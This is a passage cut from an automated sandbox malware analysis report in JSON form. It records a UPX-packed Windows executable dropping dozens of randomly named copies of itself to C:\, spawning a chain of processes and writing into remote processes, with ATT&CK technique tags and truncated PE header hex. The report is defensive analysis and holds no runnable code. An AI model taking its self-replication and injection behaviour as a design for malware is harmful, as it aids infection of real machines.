4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"860482.exe\" wrote 14837 bytes starting with PE header signature to file \"C:\\44664.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"44664.exe\" wrote 14847 bytes starting with PE header signature to file \"C:\\86620.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"86620.exe\" wrote 14865 bytes starting with PE header signature to file \"C:\\024668.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"024668.exe\" wrote 14879 bytes starting with PE header signature to file \"C:\\08406.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"08406.exe\" wrote 14895 bytes starting with PE header signature to file \"C:\\062028.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"062028.exe\" wrote 14910 bytes starting with PE header signature to file \"C:\\482480.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"482480.exe\" wrote 14928 bytes starting with PE header signature to file \"C:\\286488.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"286488.exe\" wrote 14941 bytes starting with PE header signature to file \"C:\\26400.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"26400.exe\" wrote 14957 bytes starting with PE header signature to file \"C:\\644444.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"644444.exe\" wrote 14973 bytes starting with PE header signature to file \"C:\\442444.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"442444.exe\" wrote 14992 bytes starting with PE header signature to file \"C:\\464204.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"464204.exe\" wrote 15012 bytes starting with PE header signature to file \"C:\\688844.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"688844.exe\" wrote 15027 bytes starting with PE header signature to file \"C:\\dndhhn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dndhhn.exe\" wrote 15042 bytes starting with PE header signature to file \"C:\\rjlbldf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rjlbldf.exe\" wrote 15052 bytes starting with PE header signature to file \"C:\\bnbhnh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bnbhnh.exe\" wrote 15067 bytes starting with PE header signature to file \"C:\\648086.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"648086.exe\" wrote 15077 bytes starting with PE header signature to file \"C:\\82440.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"82440.exe\" wrote 15093 bytes starting with PE header signature to file \"C:\\884648.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"884648.exe\" wrote 15109 bytes starting with PE header signature to file \"C:\\hhbbtl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"ffffffr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lvhrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bfltjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"htplvld.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"024046.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4088402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"046486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"282482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pljnf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"thdjjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hhbbtl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hhbbtl.exe]- [targetUID: 00000000-00002204]\n \"884648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\884648.exe]- [targetUID: 00000000-00003536]\n \"82440.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82440.exe]- [targetUID: 00000000-00003536]\n \"648086.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\648086.exe]- [targetUID: 00000000-00002308]\n \"bnbhnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnbhnh.exe]- [targetUID: 00000000-00002676]\n \"rjlbldf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rjlbldf.exe]- [targetUID: 00000000-00002676]\n \"dndhhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dndhhn.exe]- [targetUID: 00000000-00003816]\n \"688844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\688844.exe]- [targetUID: 00000000-00003816]\n \"464204.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\464204.exe]- [targetUID: 00000000-00001668]\n \"442444.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\442444.exe]- [targetUID: 00000000-00000820]\n \"644444.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\644444.exe]- [targetUID: 00000000-00000820]\n \"26400.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\26400.exe]- [targetUID: 00000000-00001404]\n \"286488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\286488.exe]- [targetUID: 00000000-00001404]\n \"482480.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\482480.exe]- [targetUID: 00000000-00000624]\n \"062028.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\062028.exe]- [targetUID: 00000000-00000624]\n \"08406.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08406.exe]- [targetUID: 00000000-00001828]\n \"024668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\024668.exe]- [targetUID: 00000000-00003328]\n \"86620.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\86620.exe]- [targetUID: 00000000-00003328]\n \"44664.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44664.exe]- [targetUID: 00000000-00000344]\n \"860482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\860482.exe]- [targetUID: 00000000-00001408]\n \"08240.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08240.exe]- [targetUID: 00000000-00001408]\n \"60644.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60644.exe]- [targetUID: 00000000-00003240]\n \"226448.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\226448.exe]- [targetUID: 00000000-00003280]\n \"64288.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64288.exe]- [targetUID: 00000000-00001688]\n \"42402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42402.exe]- [targetUID: 00000000-00001688]\n \"4222660.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4222660.exe]- [targetUID: 00000000-00003072]\n \"fjtbx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fjtbx.exe]- [targetUID: 00000000-00002332]\n \"ndhlfdh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ndhlfdh.exe]- [targetUID: 00000000-00006088]\n \"hlrdfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hlrdfx.exe]- [targetUID: 00000000-00006088]\n \"xddtpjj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xddtpjj.exe]- [targetUID: 00000000-00003716]\n \"880446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\880446.exe]- [targetUID: 00000000-00002604]\n \"026424.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\026424.exe]- [targetUID: 00000000-00003876]\n \"64402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64402.exe]- [targetUID: 00000000-00003876]\n \"62440.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\62440.exe]- [targetUID: 00000000-00003628]\n \"64268.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64268.exe]- [targetUID: 00000000-00004048]\n \"fnnxblt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnnxblt.exe]- [targetUID: 00000000-00002952]\n \"txjxfrd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\txjxfrd.exe]- [targetUID: 00000000-00002952]\n \"blvpbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\blvpbn.exe]- [targetUID: 00000000-00002880]\n \"thpxfjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\thpxfjv.exe]- [targetUID: 00000000-00002472]\n \"42042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42042.exe]- [targetUID: 00000000-00002868]\n \"6886668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6886668.exe]- [targetUID: 00000000-00003636]\n \"drjtt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\drjtt.exe]- [targetUID: 00000000-00003636]\n \"xdhfnxr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xdhfnxr.exe]- [targetUID: 00000000-00003512]\n \"drlrf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\drlrf.exe]- [targetUID: 00000000-00001168]\n \"lvvjfph.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvvjfph.exe]- [targetUID: 00000000-00003576]\n \"pdtrht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdtrht.exe]- [targetUID: 00000000-00004264]\n \"rjjxrvl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rjjxrvl.exe]- [targetUID: 00000000-00004264]\n \"642824.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\642824.exe]- [targetUID: 00000000-00004012]\n \"0882288.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0882288.exe]- [targetUID: 00000000-00003800]\n \"2688428.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2688428.exe]- [targetUID: 00000000-00003800]\n \"06462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06462.exe]- [targetUID: 00000000-00002968]\n \"848482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\848482.exe]- [targetUID: 00000000-00006040]\n \"42242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42242.exe]- [targetUID: 00000000-00006040]\n \"886408.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\886408.exe]- [targetUID: 00000000-00004116]\n \"82064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82064.exe]- [targetUID: 00000000-00006080]\n \"208464.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\208464.exe]- [targetUID: 00000000-00006080]\n \"xjdpttx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xjdpttx.exe]- [targetUID: 00000000-00005976]\n \"pdrvn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdrvn.exe]- [targetUID: 00000000-00006132]\n \"trrtd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\trrtd.exe]- [targetUID: 00000000-00006132]\n \"660202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\660202.exe]- [targetUID: 00000000-00005888]\n \"00802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00802.exe]- [targetUID: 00000000-00005868]\n \"pthnb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pthnb.exe]- [targetUID: 00000000-00005896]\n \"lvhxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvhxj.exe]- [targetUID: 00000000-00005816]\n \"620006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\620006.exe]- [targetUID: 00000000-00006020]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" has section name UPX1 with entropy \"7.97244478673\"\n \"ffffffr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"lvhrb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bfltjr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"htplvld.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"024046.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4088402.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"046486.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"282482.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"pljnf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"thdjjv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hhbbtl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"884648.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"82440.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"648086.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bnbhnh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rjlbldf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"dndhhn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"688844.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"464204.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"442444.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"644444.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"26400.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"286488.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"482480.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" has a section named \"UPX0\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" has a section named \"UPX1\"\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9\" has a section named \"UPX2\"\n \"ffffffr.exe\" has a section named \"UPX0\"\n \"ffffffr.exe\" has a section named \"UPX1\"\n \"ffffffr.exe\" has a section named \"UPX2\"\n \"lvhrb.exe\" has a section named \"UPX0\"\n \"lvhrb.exe\" has a section named \"UPX1\"\n \"lvhrb.exe\" has a section named \"UPX2\"\n \"bfltjr.exe\" has a section named \"UPX0\"\n \"bfltjr.exe\" has a section named \"UPX1\"\n \"bfltjr.exe\" has a section named \"UPX2\"\n \"htplvld.exe\" has a section named \"UPX0\"\n \"htplvld.exe\" has a section named \"UPX1\"\n \"htplvld.exe\" has a section named \"UPX2\"\n \"024046.exe\" has a section named \"UPX0\"\n \"024046.exe\" has a section named \"UPX1\"\n \"024046.exe\" has a section named \"UPX2\"\n \"4088402.exe\" has a section named \"UPX0\"\n \"4088402.exe\" has a section named \"UPX1\"\n \"4088402.exe\" has a section named \"UPX2\"\n \"046486.exe\" has a section named \"UPX0\"\n \"046486.exe\" has a section named \"UPX1\"\n \"046486.exe\" has a section named \"UPX2\"\n \"282482.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" (UID: 00000000-00006020)\n Spawned process \"620006.exe\" (UID: 00000000-00005816)\n Spawned process \"lvhxj.exe\" (UID: 00000000-00005952)\n Spawned process \"pthnb.exe\" (UID: 00000000-00005896)\n Spawned process \"00802.exe\" (UID: 00000000-00005868)\n Spawned process \"660202.exe\" (UID: 00000000-00005888)\n Spawned process \"trrtd.exe\" (UID: 00000000-00006132)\n Spawned process \"pdrvn.exe\" (UID: 00000000-00005976)\n Spawned process \"xjdpttx.exe\" (UID: 00000000-00004296)\n Spawned process \"208464.exe\" (UID: 00000000-00006080)\n Spawned process \"82064.exe\" (UID: 00000000-00004116)\n Spawned process \"886408.exe\" (UID: 00000000-00006128)\n Spawned process \"42242.exe\" (UID: 00000000-00006040)\n Spawned process \"848482.exe\" (UID: 00000000-00003792)\n Spawned process \"06462.exe\" (UID: 00000000-00002968)\n Spawned process \"2688428.exe\" (UID: 00000000-00003800)\n Spawned process \"0882288.exe\" (UID: 00000000-00005960)\n Spawned process \"642824.exe\" (UID: 00000000-00004012)\n Spawned process \"rjjxrvl.exe\" (UID: 00000000-00004264)\n Spawned process \"pdtrht.exe\" (UID: 00000000-00003576)\n Spawned process \"lvvjfph.exe\" (UID: 00000000-00003784)\n Spawned process \"drlrf.exe\" (UID: 00000000-00001168)\n Spawned process \"xdhfnxr.exe\" (UID: 00000000-00003512)\n Spawned process \"drjtt.exe\" (UID: 00000000-00003636)\n Spawned process \"6886668.exe\" (UID: 00000000-00002868)\n Spawned process \"42042.exe\" (UID: 00000000-00002472)\n Spawned process \"thpxfjv.exe\" (UID: 00000000-00003780)\n Spawned process \"blvpbn.exe\" (UID: 00000000-00002880)\n Spawned process \"txjxfrd.exe\" (UID: 00000000-00002952)\n Spawned process \"fnnxblt.exe\" (UID: 00000000-00002240)\n Spawned process \"64268.exe\" (UID: 00000000-00004048)\n Spawned process \"62440.exe\" (UID: 00000000-00003628)\n Spawned process \"64402.exe\" (UID: 00000000-00003876)\n Spawned process \"026424.exe\" (UID: 00000000-00002604)\n Spawned process \"880446.exe\" (UID: 00000000-00000876)\n Spawned process \"xddtpjj.exe\" (UID: 00000000-00003716)\n Spawned process \"hlrdfx.exe\" (UID: 00000000-00006088)\n Spawned process \"ndhlfdh.exe\" (UID: 00000000-00003288)\n Spawned process \"fjtbx.exe\" (UID: 00000000-00002332)\n Spawned process \"4222660.exe\" (UID: 00000000-00003072)\n Spawned process \"42402.exe\" (UID: 00000000-00001688)\n Spawned process \"64288.exe\" (UID: 00000000-00003280)\n Spawned process \"226448.exe\" (UID: 00000000-00003240)\n Spawned process \"60644.exe\" (UID: 00000000-00003312)\n Spawned process \"08240.exe\" (UID: 00000000-00001408)\n Spawned process \"860482.exe\" (UID: 00000000-00003300)\n Spawned process \"44664.exe\" (UID: 00000000-00000344)\n Spawned process \"86620.exe\" (UID: 00000000-00003328)\n Spawned process \"024668.exe\" (UID: 00000000-00002680)\n Spawned process \"08406.exe\" (UID: 00000000-00001828)\n Spawned process \"062028.exe\" (UID: 00000000-00000624)\n Spawned process \"482480.exe\" (UID: 00000000-00004424)\n Spawned process \"286488.exe\" (UID: 00000000-00001404)\n Spawned process \"26400.exe\" (UID: 00000000-00002872)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" wrote 32 bytes to a remote process \"C:\\620006.exe\" (Handle: 68)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" wrote 52 bytes to a remote process \"C:\\620006.exe\" (Handle: 68)\n \"7af444d243e34ceb08f65a090a52c588f9ff4e05241f1f7437305bbf9decc0c9.exe\" wrote 4 bytes to a remote process \"C:\\620006.exe\" (Handle: 68)\n \"620006.exe\" wrote 32 bytes to a remote process \"C:\\lvhxj.exe\" (Handle: 116)\n \"620006.exe\" wrote 52 bytes to a remote process \"C:\\lvhxj.exe\" (Handle: 116)\n \"620006.exe\" wrote 4 bytes to a remote process \"C:\\lvhxj.exe\" (Handle: 116)\n \"lvhxj.exe\" wrote 32 bytes to a remote process \"C:\\pthnb.exe\" (Handle: 68)\n \"lvhxj.exe\" wrote 52 bytes to a remote process \"C:\\pthnb.exe\" (Handle: 68)\n \"lvhxj.exe\" wrote 4 bytes to a remote process \"C:\\pthnb.exe\" (Handle: 68)\n \"pthnb.exe\" wrote 32 bytes to a remote process \"C:\\00802.exe\" (Handle: 120)\n \"pthnb.exe\" wrote 52 bytes to a remote process \"C:\\00802.exe\" (Handle: 120)\n \"pthnb.exe\" wrote 4 bytes to a remote process \"C:\\00802.exe\" (Handle: 120)\n \"00802.exe\" wrote 32 bytes to a remote process \"C:\\660202.exe\" (Handle: 120)\n \"00802.exe\" wrote 52 bytes to a remote process \"C:\\660202.exe\" (Handle: 120)\n \"00802.exe\" wrote 4 bytes to a remote process \"C:\\660202.exe\" (Handle: 120)\n \"660202.exe\" wrote 32 bytes to a remote process \"C:\\trrtd.exe\" (Handle: 116)\n \"660202.exe\" wrote 52 bytes to a remote process \"C:\\trrtd.exe\" (Handle: 116)\n \"660202.exe\" wrote 4 bytes to a remote process \"C:\\trrtd.exe\" (Handle: 116)\n \"trrtd.exe\" wrote 32 bytes to a remote process \"C:\\pdrvn.exe\" (Handle: 116)\n \"trrtd.exe\" wrote 52 bytes to a remote process \"C:\\pdrvn.exe\" (Handle: 116)\n \"trrtd.exe\" wrote 4 bytes to a remote process \"C:\\pdrvn.exe\" (Handle: 116)\n \"pdrvn.exe\" wrote 32 bytes to a remote process \"C:\\xjdpttx.exe\" (Handle: 68)\n \"pdrvn.exe\" wrote 52 bytes to a remote process \"C:\\xjdpttx.exe\" (Handle: 68)\n \"pdrvn.exe\" wrote 4 bytes to a remote process \"C:\\xjdpttx.exe\" (Handle: 68)\n \"xjdpttx.exe\" wrote 32 bytes to a remote process \"C:\\208464.exe\" (Handle: 68)\n \"xjdpttx.exe\" wrote 52 bytes to a remote process \"C:\\208464.exe\" (Handle: 68)\n \"xjdpttx.exe\" wrote 4 bytes to a remote process \"C:\\208464.exe\" (Handle: 68)\n \"208464.exe\" wrote 32 bytes to a remote process \"C:\\82064.exe\" (Handle: 116)\n \"208464.exe\" wrote 52 bytes to a remote process \"C:\\82064.exe\" (Handle: 116)\n \"208464.exe\" wrote 4 bytes to a remote process \"C:\\82064.exe\" (Handle: 116)\n 